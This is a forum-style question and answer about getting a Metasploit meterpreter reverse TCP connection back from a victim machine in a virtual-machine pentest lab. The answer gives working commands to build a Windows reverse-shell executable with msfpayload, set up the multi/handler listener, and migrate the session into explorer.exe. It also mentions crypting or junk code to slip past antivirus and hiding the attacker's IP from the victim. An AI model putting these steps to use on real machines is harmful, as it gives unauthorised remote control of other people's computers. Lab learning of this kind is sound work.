Can I set metasploit reverse TCP connection while doing pentesting in the VMs?
msfconsole is a cool opensource pentesting tool from metasploit.
Once the exploit is valid, we can set payload to the victim. For persistent connection, we may need meterpreter. But we often test security in Virtual Machines running msfconsole. Without public IP, can the victim PC bind back to our local server in VMs?
Knowing you're using Metasploit reverse TCP is a good sign, just pointing that out.
First, you need to create a payload by doing the following:
msfpayload windows/metepreter/reverse_tcp LHOST="your local IP without quotations" LPORT="any specified port you operate on" X > filenamehere.exe
Next, follow these steps in order by number when typing into the terminal:1. msfconsole
2. use exploit/multi/handler
3. set PAYLOAD windows/meterpreter/reverse_tcp
4. set LHOST "ip you used when creating the payload in the first step without quotations"
5. set LPORT "port you used when creating the payload in the first step without quotations"
6. exploit
After you type exploit, and if followed correctly, you will get a message in the terminal like this:
[*] Started reverse handler on "IP Address"
[*] Starting the payload handler...Now, with the payload you created in the first step, you want to run it on the machine you're classing as the "victim". Of course, this won't work if you have antivirus because it (the payload) hasn't been crypted by a crypter or coded with junk code to hide the payload. Once you run the payload on the victim computer, you'll get a meterpreter session within your terminal. When you're in the meterpreter session, the first thing you need to do is migrate to explorer.exe and you can do this by typing the following into your terminal: ps (shows the current running processes on the computer with a number ID on the left of it)
migrate (id of explorer.exe) Have fun with your meterpreter session. Without public IP, can the victim PC bind back to our local server in VMs?
This is possible, but that depends. If your VM machine IP is local on your computer, usually it will assign itself to a 198 IP. That's what always happens with me anyway, so that is rendered useless to the 'victim' since it is a local IP. If you don't encrypt your TCP connection via VPN as such and the victim has the correct knowledge let's say, he can view his connection logs, see his ingoing and outgoing connections, and your connections aren't encrypted and your public IP is in plain view, he may be able to DOX or achieve information with whatever method he/she knows.